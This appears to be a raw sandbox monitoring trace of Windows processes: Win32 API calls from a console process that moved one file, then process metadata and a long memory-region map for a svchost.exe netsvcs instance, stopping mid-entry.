[0172.547] GetFileType (hFile=0x7) returned 0x2 [0172.547] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea84 | out: lpMode=0x12ea84) returned 1 [0172.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.547] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eab8 | out: lpConsoleScreenBufferInfo=0x12eab8) returned 1 [0172.547] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.548] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eaf8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.548] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eadc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eadc*=0x1a) returned 1 [0172.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.549] SetConsoleInputExeNameW () returned 0x1 [0172.549] GetConsoleOutputCP () returned 0x1b5 [0172.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.549] exit (_Code=0) Process: id = "298" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea161c0" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "271" os_parent_pid = "0xf38" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 23048 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23049 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23050 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23051 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23052 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23053 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 23054 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23055 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23056 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23057 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 23058 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 23059 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 23060 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 23061 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 23062 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23063 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 23064 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 23065 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23066 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 23067 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 23068 start_va = 0x4c0000 end_va = 0x53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23069 start_va = 0x540000 end_va = 0x932fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23070 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 23071 start_va = 0x980000 end_va = 0x981fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 23072 start_va = 0x990000 end_va = 0x993fff entry_point = 0x990000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 23073 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 23074 start_va = 0x9e0000 end_va = 0x9effff entry_point = 0x9e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23075 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 23076 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0xa30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 23077 start_va = 0xa40000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 23078 start_va = 0xa50000 end_va = 0xa50fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 23079 start_va = 0xa60000 end_va = 0xa6dfff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 23080 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 23081 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 23082 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 23083 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 23084 start_va = 0xb50000 end_va = 0xe1efff entry_point = 0xb50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 23085 start_va = 0xe20000 end_va = 0xe4ffff entry_point = 0xe20000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 23086 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 23087 start_va = 0xe90000 end_va = 0xe97fff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 23088 start_va = 0xea0000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 23089 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 23090 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 23091 start_va = 0xed0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 23092 start_va = 0xf10000 end_va = 0xf10fff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 23093 start_va = 0xf20000 end_va = 0xf3bfff entry_point = 0xf20000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 23094 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 23095 start_va = 0xf80000 end_va = 0xf81fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 23096 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 23097 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 23098 start_va = 0x1010000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 23099 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 23100 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 23101 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 23102 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 23103 start_va = 0x1180000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 23104 start_va = 0x11c0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 23105 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 23106 start_va = 0x1210000 end_va = 0x1217fff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 23107 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 23108 start_va = 0x1230000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 23109 start_va = 0x1270000 end_va = 0x12d5fff entry_point = 0x1270000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 23110 start_va = 0x12e0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 23111 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 23112 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x1370000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23113 start_va = 0x1380000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 23114 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x13c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23115 start_va = 0x13d0000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 23116 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 23117 start_va = 0x1420000 end_va = 0x1427fff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 23118 start_va = 0x1470000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 23119 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 23120 start_va = 0x14c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 23121 start_va = 0x1500000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 23122 start_va = 0x1510000 end_va = 0x1517fff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 23123 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 23124 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 23125 start_va = 0x15e0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 23126 start_va = 0x16f0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 23127 start_va = 0x1710000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 23128 start_va = 0x1770000 end_va = 0x17affff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 23129 start_va = 0x17b0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 23130 start_va = 0x17f0000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 23131 start_va = 0x18d0000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 23132 start_va = 0x1910000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 23133 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 23134 start_va = 0x1a30000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 23135 start_va = 0x1a70000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 23136 start_va = 0x1ab0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 23137 start_va = 0x1b40000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b40000" filename = "" Region: id = 23138 start_va = 0x1b50000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 23139 start_va = 0x1b60000 end_va = 0x1b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23140 start_va = 0x1b70000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b70000" filename = "" Region: id = 23141 start_va = 0x1b80000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 23142 start_va = 0x1b90000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 23143 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 23144 start_va = 0x1c20000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c20000" filename = "" Region: id = 23145 start_va = 0x1e00000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 23146 start_va = 0x1e90000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 23147 start_va = 0x1ed0000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 23148 start_va = 0x1f10000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 23149 start_va = 0x1f90000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 23150 start_va = 0x2030000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 23151 start_va = 0x2130000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 23152 start_va = 0x2330000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 23153 start_va = 0x2730000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 23154 start_va = 0x2f30000 end_va = 0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 23155 start_va = 0x2f70000 end_va = 0x302ffff entry_point = 0x2f70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 23156 start_va = 0x3080000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 23157 start_va = 0x3100000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 23158 start_va = 0x3140000 end_va = 0x410ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 23159 start_va = 0x41e0000 end_va = 0x41effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 23160 start_va = 0x41f0000 end_va = 0x41fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 23161 start_va = 0x4200000 end_va = 0x420ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004200000" filename = "" Region: id = 23162 start_va = 0x4210000 end_va = 0x421ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004210000" filename = "" Region: id = 23163 start_va = 0x4220000 end_va = 0x422ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004220000" filename = "" Region: id = 23164 start_va = 0x4230000 end_va = 0x423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004230000" filename = "" Region: id = 23165 start_va = 0x4280000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 23166 start_va = 0x4380000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 23167 start_va = 0x44e0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 23168 start_va = 0x45a0000 end_va = 0x45dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 23169 start_va = 0x45e0000 end_va = 0x461ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 23170 start_va = 0x4620000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 23171 start_va = 0x4660000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 23172 start_va = 0x46a0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 23173 start_va = 0x47a0000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 23174 start_va = 0x4800000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 23175 start_va = 0x4890000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 23176 start_va = 0x49c0000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 23177 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 23178 start_va = 0x4ad0000 end_va = 0x4bcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 23179 start_va = 0x4bd0000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 23180 start_va = 0x4cd0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 23181 start_va = 0x4dd0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 23182 start_va = 0x4fd0000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 23183 start_va = 0x5fd0000 end_va = 0x60cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005fd0000" filename = "" Region: id = 23184 start_va = 0x60d0000 end_va = 0x61cffff entry_point = 0x0 region_type = private name = "private_0x00000000060d0000" filename = "" Region: id = 23185 start_va = 0x6cc60000 end_va = 0x6ce35fff entry_point = 0x6cc60000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 23186 start_va = 0x6ce40000 end_va = 0x6cfe2fff entry_point = 0x6ce40000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 23187 start_va = 0x6e460000 end_va = 0x6e474fff entry_point = 0x6e460000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 23188 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 23189 start_va = 0x6e830000 end_va = 0x6e87bfff entry_point = 0x6e830000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 23190 start_va = 0x6e880000 end_va = 0x6e896fff entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 23191 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 23192 start_va = 0x6e900000 end_va = 0x6e949fff entry_point = 0x6e900000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 23193 start_va = 0x6e950000 end_va = 0x6e963fff entry_point = 0x6e950000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 23194 start_va = 0x6e970000 end_va = 0x6e9aafff entry_point = 0x6e970000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 23195 start_va = 0x6e9b0000 end_va = 0x6e9b5fff entry_point = 0x6e9b0000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 23196 start_va = 0x6ea30000 end_va = 0x6ea73fff entry_point = 0x6ea30000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 23197 start_va = 0x6ea80000 end_va = 0x6eb41fff entry_point = 0x6ea80000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 23198 start_va = 0x6eb50000 end_va = 0x6eb6afff entry_point = 0x6eb50000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 23199 start_va = 0x6eb70000 end_va = 0x6ebd6fff entry_point = 0x6eb70000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 23200 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 23201 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 23202 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 23203 start_va = 0x6ee90000 end_va = 0x6ee9ffff entry_point = 0x6ee90000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 23204 start_va = 0x6eea0000 end_va = 0x6eecbfff entry_point = 0x6eea0000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 23205 start_va = 0x6eed0000 end_va = 0x6eee5fff entry_point = 0x6eed0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 23206 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: 